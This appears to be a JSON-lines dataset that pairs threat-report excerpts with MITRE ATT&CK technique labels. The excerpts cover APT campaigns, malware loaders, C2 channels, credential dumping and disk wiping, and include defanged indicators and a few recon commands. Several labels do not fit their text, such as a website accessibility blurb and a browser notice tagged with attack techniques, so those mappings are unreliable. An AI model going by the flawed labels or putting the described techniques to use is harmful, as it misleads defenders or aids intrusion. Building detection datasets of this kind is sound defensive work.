{"text1":"However, while the malware used in these new attacks uses similar infection mechanisms to PlugX, it is a completely new tool with its own specific behavior patterns and architecture. We have named this tool \u201cBBSRAT. Targeting and Infrastructure . As described in earlier reports on \u201cRoaming Tiger\u201d, the attack observed in August 2015 used weaponized exploit documents that leave Russian language decoy document files after infecting the system. Figure 2 confirms that the decoy document that opens after the malware infects the system is indeed a list of international exhibitions that were conducted on Russian territory in 2015. Analysis of the command and control (C2) infrastructure shows that the newly discovered samples of BBSRAT used the same C2 domains as previously published in the \u201cRoaming Tiger\u201d campaign, including transactiona[.]com and futuresgold[.]com. This may indicate that for the newer attack campaign using BBSRAT, the adversary may have deployed purpose-built variants and\/or infrastructure for each of the intended targets. As we can see, the second command is specifically crafted to run on 64-bit versions of Microsoft Windows. Every subsequent request made by BBSRAT increments this counter by one. The following commands and sub-commands have been identified: Please refer to the appendix for a full list of identified BBSRAT samples and their associated C2 servers. Despite the fact that the information about these attackers has been public for over a year, including a listing of many of the command and control servers, they continue to reuse much of their exposed playbook","labels":"['T1546.015']"}
|
|
{"text1":"This DLL has no other noticeable characteristics, as it functions like a typical malicious sideload. After loading the encrypted payload in memory, it transfers the execution to a shellcode that is located at the beginning of the file. Once loaded in memory, the ZeroT shellcode does not present any kind of obfuscation, unlike that for PlugX. This shellcode is charged with unpacking the encrypted and compressed payload. As in the new PlugX dropper detailed below, this is done using RC4 and RtlDecompressBuffer. As in PlugX samples, the PE header of ZeroT has been tampered with, specifically the \u201cMZ\u201d and \u201cPE\u201d constants (Fig","labels":"['T1573.001']"}
|
|
{"text1":"All trusted domains, domains, and domain controllers - A list of computers and network devices on the network - The infected machine user and groups the user belongs to - The infected machine, including machine name, operating system, workstation domain, and more information - Network adapters that have connected to the machine and DNS servers","labels":"['T1069', 'T1033', 'T1016']"}
|
|
{"text1":"So this method uses psexec itself to copy the payload over the network, overwrite earlier versions (if found), and run it without waiting for any response","labels":"['T1570']"}
|
|
{"text1":"Sleeps the downloader. After that, it downloads a file from Discord. The downloaded file is in reverse byte order. Downloads file from Discord. The downloader restores the downloaded file by reversing the bytes within the file. Method that reverses the downloaded file. The restored file is a DLL and serves as the third stage of the infection chain. Retrieving third-stage public methods using Type.GetMethods","labels":"['T1105', 'T1027']"}
|
|
{"text1":"The link \u201cCheck\u201d led to a Google Docs page, which contained a link that redirected to a ZIP file. The ZIP file was hosted on a likely compromised SharePoint account and contained Domenus VBS, which downloads Harpy from https[:]\/\/fashionableeder[.]com\/info. At one victim, CARBON SPIDER subsequently deployed the aforementioned custom PS Sekur stager and profiled the Active Directory environment using the utility ADFind","labels":"['T1204.001']"}
|
|
{"text1":"1) Cannon gathers system information and saves it to a file named ini. The Trojan sends an email to sahro.bella7[at]post.cz with i.ini as the attachment, S_inf within the body and a subject with a unique system identifier via SMTPS from one of the following accounts: Bishtr.cam47 Lobrek.chizh Cervot.woprov 2) Bishtr.cam47 3) Lobrek.chizh 4) Cervot.woprov","labels":"['T1082']"}
|
|
{"text1":"Additionally, the website utilizes an AI-based application that runs in the background and optimizes its accessibility level constantly. This application remediates the website\u2019s HTML, adapts its functionality and behavior for screen-readers used by blind users, and for keyboard functions used by individuals with motor impairments","labels":"['T1095']"}
|
|
{"text1":"ESTSecurity inspected a malicious lure document discussing North Korean defectors. This lure document contained a UPX packed binary that reached out to wave[.]posadadesantiago[.]com. Based upon their report we believe SHA256: 252d1b7a379f97fddd691880c1cf93eaeb2a5e5572e92a25240b75953c88736c, either is or is strikingly similar to the document discussed in their blog post based on these similarities","labels":"['T1566.001']"}
|
|
{"text1":"The xmrig mining process joins the supportxmr mining pool using the wallet address 428uyvSqdpVZL7HHgpj2T5SpasCcoHZNTTzE3Lz2H5ZkiMzqayy19sYDcBGDCjoWbTfLBnc3tc9rG4Y8gXQ8fJiP5tqeBda. At the time of writing, the malware campaign has ~25.05 KH\/s hashing power and there is 11 XMR (~$1,500) in the wallet","labels":"['T1496']"}
|
|
{"text1":"The primary goal of the Dark Halo\u00a0threat actor was to obtain the e-mails of specific individuals at the think tank. This included a handful of select executives, policy experts, and the IT staff at the organization. Volexity notes its investigations are directly related to the FireEye report based on overlap between command-and-control (C2) domains and other related indicators such as a backdoored server running SolarWinds Orion","labels":"['T1114.002']"}
|
|
{"text1":"Finally, it creates and runs a shell script at \/tmp\/.server.sh, which also establishes a reverse shell","labels":"['T1059.003', 'T1059.004']"}
|
|
{"text1":"As with campaigns attributed to BlackEnergy group the attackers used spearphishing emails with Microsoft Excel documents attached that contain malicious macros as an initial infection vector. This time malicious documents don\u2019t have any content with social engineering directing potential victims to click an Enable Content button","labels":"['T1566.001']"}
|
|
{"text1":"1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page. 5) The PowerShell script creates a Cobalt Strike stager payload. This PowerShell script also retrieves an XOR-encoded Cobalt Strike beacon payload from an adversary-controlled domain. 6) The Cobalt Strike Beacon implant beacons to the command-and-control (C2) IP address, which is used to remotely control the implant","labels":"['T1027']"}
|
|
{"text1":"When executing the code, the browser creates an invisible image tag and sets the URL to an attack server using the file:\/\/ protocol scheme. On Windows machines, this triggers a request to a remote server via the Samba networking protocol (SMB) that also transmits the user\u2019s login NTLM hash. These hashes can be cracked to retrieve the original login password by methods of brute-force, dictionary, or rainbow table lookups","labels":"['T1003.004', 'T1552.001', 'T1555.003', 'T1003.005', 'T1555', 'T1003.001']"}
|
|
{"text1":"The ProgramArguments tell us where GrowlHelper is installed and that it takes at least one command line argument (-f). The RunAtLoad key confirms the implant will run every time the user logs in. To get an overview of the installation process, we can monitor file system activity for GrowlHelper events","labels":"['T1546.004']"}
|
|
{"text1":"TrickBot has arguably been one of the most popular Trojans for the past couple of years, used by threat actors mostly because of its modular design and highly resilient infrastructure. Bitdefender researchers even analyzed one of its modules earlier this year, particularly because it targeted telecom, education, and financial services in the US and Hong Kong","labels":"['T1090.002']"}
|
|
{"text1":"When executed, BoomBox ensures that a directory named NV is present in its current working directory; otherwise it terminates. If the directory is present, BoomBox displays the contents of the NV directory in a new Windows Explorer window (leaving it up to the user to open the PDF file","labels":"['T1480', 'T1083', 'T1480', 'T1480']"}
|
|
{"text1":"Like many other phishing attacks, in this phishing campaign, Charming Kitten uses a fake SMS (Figure 1) to trick their victims. They send confirmation messages stating \u2018Google Account Recovery\u2019 to their targets; they claim these messages are sent by Google and the user must follow the link in the SMS to confirm the identity","labels":"['T1598.003']"}
|
|
{"text1":"Viewing results Commands scheduled with at run as background processes. Output is not displayed on the computer screen. To redirect output to a file, use the redirection symbol (>). If you redirect output to a file, you need to use the escape symbol (^) before the redirection symbol, whether you are using at at the command line or in a batch file. For example, to redirect output to Output.text, type: at 14:45 c:\\test.bat ^>c:\\output.txt The current directory for the executing command is the systemroot folder. Changing system time If you change the system time at a computer after you schedule a command to run with at, synchronize the at scheduler with the revised system time by typing at without command-line options. Storing commands Scheduled commands are stored in the registry. As a result, you do not lose scheduled tasks if you restart the Schedule service. Connecting to network drives Do not use a redirected drive for scheduled jobs that access the network. The Schedule service might not be able to access the redirected drive, or the redirected drive might not be present if a different user is logged on at the time the scheduled task runs. Instead, use UNC paths for scheduled jobs","labels":"['T1053.002']"}
|
|
{"text1":"BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy","labels":"['T1071.001']"}
|
|
{"text1":"BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress. For full, comprehensive documentation of the tool and all of its commands, see bitsadmin and bitsadmin examples in the Windows IT Pro Center","labels":"['T1105']"}
|
|
{"text1":"Once the malware starts it tries to reach a hardcoded C2. The communication takes place using the unmodified HTTP-based protocol, the request and response body are RC4-encrypted, and the encryption key is also hardcoded into the sample. As the result of the RC4 encryption may contain binary data, the malware additionally encodes it in BASE64, to match the HTTP specification","labels":"['T1071.001']"}
|
|
{"text1":"TG-3390 uses DLL side loading, a technique that involves running a legitimate, typically digitally signed, program that loads a malicious DLL. The DLL acts as a stub loader, which loads and executes the shell code. The adversaries have used this technique to allow PlugX and HttpBrowser to persist on a system","labels":"['T1574.002']"}
|
|
{"text1":"1) User must open the Microsoft Word email attachment 2) User must scroll to page three of the document, which will run the DealersChoice Flash object 3) The Flash object must contact an active C2 server to download an additional Flash object containing exploit code 4) The initial Flash object must contact the same C2 server to download a secondary payload 5) Victim host must have a vulnerable version of Flash installed","labels":"['T1203']"}
|
|
{"text1":"This agent also built in a function aptly named \u201cDeleteLeftovers,\u201d to remove certain artifacts of the attack","labels":"['T1070']"}
|
|
{"text1":"In addition to the aforementioned DOCX file, we found another related DDE enabled document based on an infrastructure overlap with a Zebrocy C2 IP address. This related delivery document was an RTF file that downloaded and installed a payload used to load the open-source Koadic tool. We do not have telemetry on the target or attack vector, but we know the RTF file used DDE to download and execute an executable that loaded Koadic. We believe the actor used a cryptor on the payload, as it obtains a filename and script from within its resources and decodes these resources by multiplying each byte by negative one. The payload then uses the MD5 hash (14331d289e737093994395d3fc412afc) of what appears to be a hardcoded SHA1 hash (B6A75B1EF701710D7AEADE0FE93DE8477F3BD506) as an RC4 key to decrypt the resulting decoded data. The embedded VBScript is retrieved from a resource and decrypted using the same algorithm as discussed above, which results in the following cleartext","labels":"['T1140']"}
|
|
{"text1":"Impersonation using Kerberos pass-the-ticket attacks (Mimikatz PowerShell) - Email extraction from the MS Exchange Server using compromised credentials - Archiving sensitive information - Data exfiltration via legitimate cloud services - Secure file deletion","labels":"['T1059.001', 'T1550.003', 'T1114.002', 'T1078']"}
|
|
{"text1":"Computer name - System info using: cmd \/c systeminfo >%temp%\\temp.ini - List of currently running process using: cmd \/c tasklist >%temp%\\temp.ini","labels":"['T1082']"}
|
|
{"text1":"Different drivers will be loaded based on the system version. The malware uses IsWow64Process to determine which driver version to load. These drivers are stored in the resource section of the binary and are compressed with the Lempel-Ziv algorithm. The driver file is written to system32\\drivers with a 4-character, pseudo-randomly generated name. This file is then decompressed using LZCopy to a new file with a \u201c.sys\u201d extension","labels":"['T1027', 'T1140']"}
|
|
{"text1":"The main purpose of P8RAT is downloading and executing payloads (consisting of PE and shellcode) from its C2 server","labels":"['T1001.001']"}
|
|
{"text1":"Throughout 2017 and 2018 Unit 42 has been tracking and observing a series of highly targeted attacks focused in South East Asia, building on our research into the KHRAT Trojan. Based on the evidence, these attacks appear to be conducted by the same set of attackers using previously unknown malware families. In addition, these attacks appear to be highly targeted in their distribution of the malware used, as well as the targets chosen. We believe this group is previously unidentified and therefore we have dubbed it \u201cRANCOR\u201d. The Rancor group\u2019s attacks use two primary malware families which we describe in depth later in this blog and are naming DDKONG and PLAINTEE. DDKONG is used throughout the campaign and PLAINTEE appears to be a new addition to these attackers\u2019 toolkit. Countries Unit 42 has identified as targeted by Rancor with these malware families include, but are not limited to","labels":"['T1059.005', 'T1105']"}
|
|
{"text1":"To avoid detection, the macros employ simple obfuscation of interesting strings that ultimately just used base64 encoding. However, it used a somewhat unusual method where it would first convert the base64-encoded text into hex, and then convert that hex into a text string","labels":"['T1027']"}
|
|
{"text1":"Some additional log file analysis reveals that a dotm file hosted with a .jpg extension was accessed by an Israeli IP address. This IP address likely belongs to a victim in Israel that executed the main DOCX. Based on the analysis of the user-agent string belonging to the Israeli IP address, Microsoft+Office+Existence+Discovery indicates that the dotm file in question was downloaded from within Microsoft Office (template injection","labels":"['T1480']"}
|
|
{"text1":"1) It uses the application programming interface (API) CreateFileA to \\\\.\\PHYSICALDRIVE0 to retrieve the handle of the hard disk. 2) It overwrites the first sector of the disk (512 bytes) with \"0x00\". The first sector is the disk\u2019s MBR. 3) It will try to perform the routines above (steps 1-2) on \\\\.\\PHYSICALDRIVE1, \\\\.\\PHYSICALDRIVE2, \\\\.\\PHYSICALDRIVE3, and so on, as long as a hard disk is available","labels":"['T1082']"}
|
|
{"text1":"Upon further inspection, Kroll learned that an employee using their work computer had clicked on a malicious link from their personal email account that downloaded a Qakbot dropper","labels":"['T1059.005']"}
|
|
{"text1":"This activity has TTP and targeting overlap with previous activity, suspected to be APT29. The 2018 and 2016 LNK files are similar in structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK was created","labels":"['T1204.001', 'T1566.001']"}
|
|
{"text1":"APT19 used three different techniques to attempt to compromise targets. Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the most recent versions, APT19 added an application whitelisting bypass to the XLSM documents","labels":"['T1218.010']"}
|
|
{"text1":"WastedLocker aims to encrypt the files of the infected host. However, before the encryption procedure runs, WastedLocker performs a few other tasks to ensure the ransomware will run properly","labels":"['T1574.001']"}
|
|
{"text1":"Attempted to blend in with a file name that matched the system name it resided on - Configured for WMI persistence (generally uncommon in 2019) - Used likely compromised infrastructure for C2 - Masquerades its command-and-control (C2) traffic as legitimate Google Notifications HTTP requests","labels":"['T1071.001', 'T1001']"}
|
|
{"text1":"In most systems compromised by Kobalos, the SSH client is compromised to steal credentials. This credential stealer is unlike any of the malicious OpenSSH clients we\u2019ve seen before, and we\u2019ve looked at tens of them in the past eight years. The sophistication of this component is not the same as Kobalos itself: there was no effort to obfuscate early variants of the credential stealer. However, we found newer variants that contain some obfuscation and the ability to exfiltrate credentials over the network","labels":"['T1048']"}
|
|
{"text1":"The C2 server can also send a PowerShell command to capture and store a screenshot of a victim\u2019s system. POWRUNER will send the captured screenshot image file to the C2 server if the \u201cfileupload\u201d command is issued. Figure 6 shows the PowerShell \u201cGet-Screenshot\u201d function sent by the C2 server","labels":"['T1113']"}
|
|
{"text1":"At installation, the MSI file drops three files and creates one hidden directory (UFile) into C:\\ProgramData\\Apple\\Update\\, likely as a ruse","labels":"['T1564.001', 'T1564.001']"}
|
|
{"text1":"On execution, the MSI downloader starts by checking if it is running in a virtual machine. If not, downloads a zip file, unzips it, deletes itself, establishes persistency and restarts the system","labels":"['T1140', 'T1102.003']"}
|
|
{"text1":"ServHelper\u2019s payload, an NSIS Installer signed with a valid digital signature (further details on the certificate ahead), is downloaded by msiexec.exe to its temporary folder (C:\\Windows\\Installer\\MSI[4-character-string].tmp) and executed","labels":"['T1218.007']"}
|
|
{"text1":"secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec\/wmiexec approach. mimikatz.py: Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi","labels":"['T1003.004', 'T1003.002', 'T1003.003', 'T1003.001']"}
|
|
{"text1":"To recap, on September 18, 2017, we disclosed that CCleaner had been targeted by cybercriminals, in order to distribute malware via the CCleaner installation file. The altered installation file was downloaded by 2.27 million CCleaner customers worldwide. The malware was introduced to the build server of Piriform, the company developing CCleaner, some time between March 11 and July 4, 2017, prior to Avast\u2019s acquisition of Piriform on July 18, 2017","labels":"['T1195.002']"}
|
|
{"text1":"These credentials are used in a credential stuffing or password spraying attack against the victim\u2019s remote services, such as webmail or other internet reachable mail services. After obtaining a valid account, they use this account to access the victim\u2019s VPN, Citrix or another remote service that allows access to the network of the victim. Information regarding these remote services is taken from the mailbox, cloud drive, or other cloud resources accessible by the compromised account. As soon as they have a foothold on a system (also known as patient zero or index case), they check the permissions of the account on that system, and attempt to obtain a list of accounts with administrator privileges. With this list of administrator accounts, the adversary performs another password spraying attack until a valid admin account is compromised. From here on the adversary stops using the victim\u2019s remote service to access the victim\u2019s network, and starts using the Cobalt Strike beacon for remote access and command and control","labels":"['T1082']"}
{"text1":"This dynamic link library appears to be a legitimate version of libcurl.dll\u202fexcept for\u202fa single exported function, which is referred to as ordinal #52 and\u202fcurl_share_init\u202fin the analyzed sample. This function has been modified by threat actors to extract a resource contained within libcurl.dll, decrypt malicious data\u202fincluded in that resource, and load the resulting DLL to execute a malicious function. When this function is executed, the\u202fSodomNormal\u202fcommunications module begins running within Libcurl.dll","labels":"['T1140']"}
{"text1":"Wscript.exe does a number of things: It deletes the original QakBot.vbs and writes four files to disk in %APPDATA% induce.flac, pep.csv, rhythm.tex and senate.m4a. Senate.m4a is deleted after full process execution","labels":"['T1070.004']"}
{"text1":"These privilege escalation modules are the ones we caught when we queried for Jian\u2019s global configuration table. We also found a couple of more Local Privilege Escalation exploits from the NtElevation series","labels":"['T1068']"}
{"text1":"First, several of these commands contain checks to determine the environment in order to use appropriate paths or commands. The \u2018tasklist\u2019 command will use a WMI query or the \u201cps\u201d command, which allows Kazuar to obtain running processes from both Windows and Unix systems. Also, Kazuar\u2019s \u2018cmd\u2019 command will run commands using \u201ccmd.exe\u201d for Windows systems and \u201c\/bin\/bash\u201d for Unix systems. These two commands provide evidence that the authors of Kazuar intended to use this malware as a cross-platform tool to target both Windows and Unix systems","labels":"['T1059.003']"}
{"text1":"All the commands received from the C2 are first saved to an auxiliary file and then stored encrypted in the system registry. The standalone thread will decrypt and execute them","labels":"['T1059.003', 'T1047']"}
{"text1":"sifo \u2013 Collect victim system information - drive \u2013 List drives on victim machine - list \u2013 List file information for provided directory - upload \u2013 Upload a file to the victim machine - open \u2013 Spawn a command shell","labels":"['T1082', 'T1083', 'T1105', 'T1082', 'T1083']"}
{"text1":"The buffer containing the ZxShell Dll in the new location is freed using the VirtualFree API function. A handle to the DLL file is taken in order to make its deletion more difficult. The ZxShell mutex is created named @_ZXSHELL_","labels":"['T1218.011']"}
{"text1":"Use of Open Source Tools In an attempt to avoid detection and as an anti-analysis tactic, the OilRig group abused an open source tool called Invoke-Obfuscation to obfuscate the code used for QUADAGENT. Invoke-Obfuscation is freely available via a Github repository and allows a user to change the visual representation of a PowerShell script simply by selecting the desired obfuscation techniques. Invoke-Obfuscation offers a variety of obfuscation techniques, and by analyzing the script we were able to ascertain the specific options in this attack. After identifying the specific options used to obfuscate QUADAGENT, we were able to deobfuscate the PowerShell script and perform additional analysis. We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script. Invoke-Obfuscation calls the string obfuscation used by the actors to further obfuscate this script Reorder, which uses the string formatting functionality within PowerShell to reconstruct strings from out of order substrings (ex. 1}{0}\" -f 'bar','foo'). During our analysis, we installed Invoke-Obfuscation and used it to obfuscate a previously collected QUADAGENT sample to confirm our analysis","labels":"['T1059.001']"}
{"text1":"Further into the infection process, the malware chooses a service name randomly from netsvc in order to use it for the payload creation path. The malware then creates a file named bcdbootinfo.tlp in the system folder containing the infection time and the random service name that is chosen. We\u2019ve discovered that the malware operator checks this file to see whether the remote host was infected and, if so, when the infection happened","labels":"['T1547.001']"}
{"text1":"Between August 2 and 4, the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors","labels":"['T1204.001']"}
{"text1":"The module gathers information about the user and attempts to verify whether this is a local admin or a domain admin. This shows that after infecting the machine, Valak chooses to target mainly administrators and domain admins. This indicates a propensity to target higher profile accounts such as enterprise admins","labels":"['T1087.001', 'T1087.002']"}
{"text1":"The initial routine decrypts selected parts of the code section using XOR with a hardcoded value","labels":"['T1027']"}
{"text1":"A second method consists to use the CredEnumerateW Windows API. Finally, Perfc.dat contains three embedded executables in its resource section which are compressed with zlib. Two of the executables are used to recover user credentials (32 and 64 bits) while the third one is the PsExec binary","labels":"['T1021.002']"}
{"text1":"It can download and execute arbitrary code provided from the C&C server, as well as maintain a virtual file system (VFS) inside the registry. The VFS, and any additional files created by the code, are encrypted and stored in a location unique to each victim","labels":"['T1027']"}
{"text1":"In June 2015, a number of web portal email accounts were hacked, sending emails with malicious Hangul document files and phishing emails to steal portal account credentials. In January 2016, a large number of emails with malicious attachments were sent under the guise of \u2018Office of National Security at the Blue House\u2019 to government research institutes. Analysis by related organizations identified the malicious attachment as Kimsuky malware [3","labels":"['T1586.002']"}
{"text1":"Both malicious programs share the code for LZMA compression algorithm. In CloudAtlas it is used to compress the logs and to decompress the decrypted payload from the C&C servers, while in Red October the \u201cscheduler\u201d plugin uses it to decompress executable payloads from the C&C","labels":"['T1059.001', 'T1059.005']"}
{"text1":"X-Session: 0\"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. The malware can be configured to use multiple network protocols to avoid network-based detection. DLL side loading is often used to maintain persistence on the compromised system. Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures. DLL side loading has been used to maintain persistence on the compromised system. More information about HttpBrowser is available in Appendix B. HttpBrowser URI. Source: Dell SecureWorks) - ChinaChopper web shell \u2014 A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. TG-3390 has used additional web shells containing similarly formatted passwords","labels":"['T1071.004']"}
{"text1":"Similar to RIPTIDE campaigns, APT12 infects target systems with HIGHTIDE using a Microsoft Word (.doc) document that exploits CVE-2012-0158. FireEye observed APT12 deliver these exploit documents via phishing emails in multiple cases. Based on past APT12 activity, we expect the threat group to continue to utilize phishing as a malware delivery method","labels":"['T1203']"}
{"text1":"The screenshot in Figure 8 of the inf method within a Cannon sample (SHA256: 4405cfbf28. ) shows the information gathered that is exfiltrated to the C2 via email, specifically with RunningPlace and LogicalDrives header strings","labels":"['T1082']"}
{"text1":"The second generation (2.x) was used to conduct an attack which we investigated during its active stage. We successfully prevented data transfer to the cybercriminals\u2019 server and isolated the infected systems in the company\u2019s local network. The incidents, as well as results of our investigation, are described in the full report on the Winnti group (PDF","labels":"['T1014']"}
{"text1":"Conficker will copy itself with a random name into the system directory %systemroot%\\system32 and register itself as a service. The remote computer will then download the worm from the URL given and then start to infect other machines as well. Upon successful infection, it will also patch the hole to prevent other worms to infect the machine\" (Racicot","labels":"['T1046', 'T1112']"}
{"text1":"On October 28, we observed APT3 sending out spearphishing messages containing a compressed executable attachment. The deflated exe was a variant of the same downloader described above and connected to 198.55.115.71 over port 1913 via SOCKS5 proxy. The secondary payload in that case was detected as Backdoor.APT.CookieCutter (aka Pirpi) and also named newnotepad.exe (MD5 8849538ef1c3471640230605c2623c67) and connected to the known APT3 domains","labels":"['T1090.002', 'T1095']"}
{"text1":"You are using Microsoft Internet Explorer. We recommend using Chrome or Firefox for the best experience","labels":"['T1059.003']"}
{"text1":"In addition, PLAINTEE will create a unique GUID via a call to CoCreateGuid() to be used as an identifier for the victim. The malware then proceeds to collect general system enumeration data about the infected machine and enters a loop where it will decode an embedded config blob and send an initial beacon to the C2 server. The configuration blob is encoded using a simple single-byte XOR scheme. The first byte of the string is used as the XOR key to in turn decode the remainder of the data","labels":"['T1573.001']"}
{"text1":"We named Lazarus the most active group of 2020. We\u2019ve observed numerous activities by this notorious APT group targeting various industries. The group has changed target depending on the primary objective. Google TAG has recently published a post about a campaign by Lazarus targeting security researchers. We have seen Lazarus attack various industries using this malware cluster before. In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped). While investigating this activity, we were able to observe the complete life cycle of an attack, uncovering more technical details and links to the group\u2019s other campaigns","labels":"['T1005', 'T1566.002', 'T1204.002']"}
{"text1":"Once the initial computer on the targeted organization\u2019s network is infected with Vcrodat, Whitefly begins mapping the network and infecting further computers. The attackers rely heavily on tools such as Mimikatz to obtain credentials. Using these credentials, the attackers are able to compromise more machines on the network and, from those machines, again obtain more credentials","labels":"['T1588.002', 'T1068']"}
{"text1":"The diagram below illustrates the methodology used by the actor to communicate with the FoggyWeb backdoor located on a compromised internet-facing AD FS server","labels":"['T1071.001']"}
{"text1":"id \u2014 the generated unique identifier of the infected host - message \u2014 the Base64-encoded output from the newly created cmd.exe console process","labels":"['T1027']"}
{"text1":"The archive contains\u00a0a\u00a0legitimate\u00a0older version of Microsoft Word (Microsoft Word 2007)\u00a0executable file\u00a0that\u00a0is\u00a0named\u00a0\u2018Noi\u00a0dung chi\u00a0tiet\u00a0don\u00a0khieu\u00a0nai\u00a0gui\u00a0cong\u00a0ty.exe\u2019\u00a0which\u00a0translates to\u00a0\u2018Learn more about how to use your company\u2019\u00a0in English. The attacker used\u00a0the DLL side loading technique to load a malicious DLL by the older\u00a0version of Microsoft Word. When opening the executable file in the archive, it\u00a0loads\u00a0the\u00a0malicious DLL in the same directory. The DLL\u00a0executes multi-stage shellcodes\u00a0and each shellcode employs various technique to hide the next stage","labels":"['T1574.002']"}
{"text1":"Summary In early May, Unit 42 discovered an attack campaign against at least one defense company in Russia and one unidentified organization in South Korea delivering a variant of Bisonal malware. While not previously publicly documented, the variant has been in the wild since at least 2014. There are three primary differences between it and older Bisonal malware including a different cipher and encryption for C2 communication, and a large rewrite of the code for both network communication and maintaining persistence. The adversary behind these attacks lured the targets into launching the Microsoft Windows executable malware by masquerading it as a PDF file (using a fake PDF icon) and reusing publicly available data for the decoy PDF file\u2019s contents. Attacks using Bisonal have been blogged about in the past. We believe it is likely these tools are being used by one group of attackers. Though Bisonal malware has been in the wild for at least seven years and frequently updated, the actors keep using same high-level playbooks. Common features of attacks involving Bisonal include","labels":"['T1105']"}
{"text1":"After decoding the PDF and AppleSeed payload, the content gets written into the ProgramData directory. At the end, the decoy PDF file is opened by calling Wscript.Shell.Run and the AppleSeed payload executed through PowerShell by calling regsvr32.exe. Calling regsvr32.exe to run a DLL registers it as a server that automatically calls the DLL export function that has been named DllRegisterServer","labels":"['T1218.010']"}
{"text1":"To illustrate a real example of how this worked and looked to a website visitor, the following section will use one of the few pages of the fake site baomoivietnam[.]com that was designed to profile visitors and deliver malware or a phishing link. On this site, a news story (https:\/\/www.baomoivietnam[.]com\/dai-hoc-ton-duc-thang-hieu-truong-lam-quyen-de-xay-ra-sai-pham\/) about an investigation into potential improper conduct by a university professor in Vietnam contained malicious content. Once the page was accessed, a special OceanLotus server on the hostname\u00a0cdn.arbenha[.]com would be leveraged to load malicious JavaScript to load a fake video player. At first, the page would display a dialog indicating that the video was loading (\u0110ang t\u1ea3i) as shown in Figure 1 below","labels":"['T1598.003']"}
{"text1":"In November 2019, when MegaCortex v4 appeared, there was a rollback of sorts, bringing the Base64 key back into play and using it to decrypt the malware\u2019s components. The implementation was not the same as previous versions, with that Base64 key embedded into the binary and then passed to a decrypting function instead of passing it as an argument to the command-line","labels":"['T1140']"}
{"text1":"The script sets up a new HTTP object and then tries to disable the system's local proxy settings","labels":"['T1562.001']"}
{"text1":"Bisonal main module The DLL (pvcu.dll) is Bisonal malware but using a different cipher for C2 communication that other publicly documented samples. Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body. The Bisonal sample we observed in this case employs the RC4 cipher with the key \u201c78563412\u201d. To date, all Bisonal samples we have seen using RC4 use this same key. The oldest sample we have dates to 2014, so this variant has been in the wild for several years. For example, the Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2","labels":"['T1082', 'T1071.001', 'T1140']"}
{"text1":"When executed, QakBot will check whether it has previously been executed on the machine by checking for the specified malware folder. If QakBot discovers it is a first time run, it will relaunch itself from cmd.exe with the \/C parameter that will inform the loader to proceed and run its Anti-VM checks on the machine and return the results to the parent process. If QakBot detects it is running in a VM environment, then the final payload will not be decrypted since QakBot uses the return value from these checks in its final decryption routine. Figure 7 below shows the QakBot environment check logic","labels":"['T1057', 'T1055.012', 'T1059.003', 'T1083']"}
{"text1":"loaddl: a command responsible for downloading and executing additional modules using the rundll32.exe process. selfkill: a command that is responsible for self-terminating and deleting the malware from the machine","labels":"['T1105']"}
{"text1":"WMI permanent event subscriptions can be used to trigger actions when specified conditions are met. Attackers often use this functionality to persist the execution of backdoors at system start up. Subscriptions consist of three core WMI classes: a Filter, a Consumer, and a FilterToConsumerBinding. WMI Consumers specify an action to be performed, including executing a command, running a script, adding an entry to a log, or sending an email. WMI Filters define conditions that will trigger a Consumer, including system startup, the execution of a program, the passing of a specified time and many others. Creating a WMI permanent event subscription requires administrative privileges on a system","labels":"['T1546.003']"}
{"text1":"The RTF file contains macro codes that will execute a PowerShell command to retrieve a dynamic-link library (DLL) file before executing it using odbcconf.exe, a command-line utility related to Microsoft Data Access Components. The DLL will drop and execute a malicious JScript using regsvr32.exe, another command-line utility, to download another JScript and execute it using the same regsvr32.exe. During analysis, we received a PowerShell command that downloads Cobalt Strike from hxxps:\/\/5[.]135[.]237[.]216[\/]RLxF","labels":"['T1059.001', 'T1218.010', 'T1218.008']"}
{"text1":"In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. The stealer attempts to obtain credentials from LSASS with a technique similar to that used by Mimikatz","labels":"['T1555.003', 'T1003.001']"}
{"text1":"The SOMBRAT backdoor is packaged as a 64-bit Windows executable. It communicates with a configurable command and control (C2) server via multiple protocols, including DNS, TLS-encrypted TCP, and potentially WebSockets. The backdoor's primary purpose is to download and execute plugins provided via the C2 server. In contrast to the SOMBRAT version published in November 2020, Mandiant observed additional obfuscation and armoring to evade detection, this SOMBRAT variant has been hardened to discourage analysis. Program metadata typically included by the compiler has been stripped and strings have been inlined and encoded via XOR-based routines","labels":"['T1095']"}
{"text1":"As seen in the above image, the Bazar backdoor can handle quite a few commands. This next section focuses on case 1, which retrieves various pieces of additional information on the infected machine","labels":"['T1005']"}
{"text1":"2) Scan the network environment of the infected machine; checks for availability of specific ports on servers that share the same internal and external subnet mask (i.e 255.255.0.0\\16). 3) Try to exploit the following Remote Code Execution vulnerabilities in the targeted servers","labels":"['T1046']"}
